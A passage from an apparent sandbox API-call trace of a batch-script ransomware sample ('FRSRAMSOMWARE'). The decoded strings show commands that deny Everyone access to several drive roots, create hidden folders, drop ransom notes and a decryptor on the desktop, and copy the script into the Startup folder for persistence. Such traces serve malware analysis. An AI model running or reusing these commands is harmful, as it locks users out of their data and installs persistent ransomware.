nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0101.975] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0101.975] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.975] GetFileType (hFile=0x158) returned 0x1 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0101.975] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0101.975] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0101.975] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.975] GetFileType (hFile=0x158) returned 0x1 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0101.976] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0101.976] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0101.976] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.976] GetFileType (hFile=0x158) returned 0x1 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0101.976] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0101.976] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0101.976] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.976] GetFileType (hFile=0x158) returned 0x1 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0101.976] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0101.976] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0101.976] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.976] GetFileType (hFile=0x158) returned 0x1 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0101.976] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0101.976] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0101.976] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.976] GetFileType (hFile=0x158) returned 0x1 [0101.976] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0101.976] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0101.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0101.977] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.977] GetFileType (hFile=0x158) returned 0x1 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0101.977] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0101.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0101.977] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.977] GetFileType (hFile=0x158) returned 0x1 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0101.977] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0101.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0101.977] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.977] GetFileType (hFile=0x158) returned 0x1 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0101.977] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0101.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0101.977] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.977] GetFileType (hFile=0x158) returned 0x1 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0101.977] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.977] SetFilePointer (in: hFile=0x158, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0101.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0101.978] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.978] GetFileType (hFile=0x158) returned 0x1 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0101.978] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0101.978] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0101.978] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.978] GetFileType (hFile=0x158) returned 0x1 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0101.978] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0101.978] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0101.978] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.978] GetFileType (hFile=0x158) returned 0x1 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0101.978] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0101.978] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0101.978] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.978] GetFileType (hFile=0x158) returned 0x1 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0101.978] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0101.978] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0101.978] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0101.978] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.979] GetFileType (hFile=0x158) returned 0x1 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0101.979] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0101.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0101.979] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.979] GetFileType (hFile=0x158) returned 0x1 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0101.979] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0101.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0101.979] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.979] GetFileType (hFile=0x158) returned 0x1 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0101.979] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0101.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0101.979] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.979] GetFileType (hFile=0x158) returned 0x1 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0101.979] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0101.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0101.979] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0101.979] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.979] GetFileType (hFile=0x158) returned 0x1 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0101.980] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0101.980] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0101.980] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.980] GetFileType (hFile=0x158) returned 0x1 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0101.980] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0101.980] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0101.980] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.980] GetFileType (hFile=0x158) returned 0x1 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0101.980] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0101.980] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0101.980] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.980] GetFileType (hFile=0x158) returned 0x1 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0101.980] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0101.980] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0101.980] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.980] GetFileType (hFile=0x158) returned 0x1 [0101.980] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0101.980] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) 